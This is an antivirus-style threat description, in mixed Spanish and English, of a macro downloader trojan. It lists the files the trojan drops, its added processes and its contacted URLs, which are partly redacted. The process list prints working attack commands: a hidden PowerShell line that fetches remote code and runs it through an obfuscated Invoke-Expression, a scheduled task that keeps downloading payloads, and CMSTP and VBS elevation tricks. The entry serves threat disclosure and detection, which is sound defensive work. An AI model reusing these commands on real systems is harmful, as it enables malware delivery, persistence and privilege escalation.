Trojan.P97M.DLOADR.TIOIBEPN
Alias
Trojan-Downloader.VBA.Agent (IKARUS)
Plataforma:
Windows
Riesgo general:
Potencial de destrucción:
Potencial de distribución:
Infección divulgada:
Revelación de la información:
Bajo
Medio
High
Crítico
Tipo de malware
Trojan
Destructivo?
No
Cifrado
In the Wild:
Sí
Resumen y descripción
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Detalles técnicos
Tamaño del archivo 117,037 bytes
Tipo de archivo Other
Residente en memoria No
Fecha de recepción de las muestras iniciales 01 Feb 2022
Detalles de entrada
It arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.
Instalación
Infiltra los archivos siguientes:
- %Public%\peee.com
- %Public%\hahahha.vbs
- %User Temp%\CMSTP.inf
Agrega los procesos siguientes:
- %Public%\peee.com http://www.j.mp/akd{BLOCKED}
- powershell.exe -w h -NoProfile -ExecutionPolicy Bypass -Command (New-Object IO.StreamReader([Net.HttpWebRequest]::Create('https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file').GetResponse().GetResponseStream())).ReadToEnd()|I'e'x
- schtasks /create /sc MINUTE /mo 182 /tn asasdwddasdeyu /F /tr """%Public%/peee.com""""""https://www.me{BLOCKED}.com/file/ch{BLOCKED}/9.htm/file"""
- "%Windows%\Microsoft.NET\Framework\v2.0.50727\aspnet_compiler.exe"
- "%System%\cmstp.exe" /au %User Temp%\CMSTP.inf
- Wscript %Public%\hahahha.vbs
- "%System%\Wscript.exe" "%Public%\hahahha.vbs" /elevate
Otros detalles
It connects to the following possibly malicious URL:
- http://www.j.mp/akd{BLOCKED}
- http://bit.ly/akd{BLOCKED}
- https://www.me{BLOCKED}.com/file/4v{BLOCKED}/9.htm/file
- https://www.me{BLOCKED}.com/file/ey{BLOCKED}/9.dll/file
- https://www.me{BLOCKED}.com/file/vg{BLOCKED}/F2.vbs/file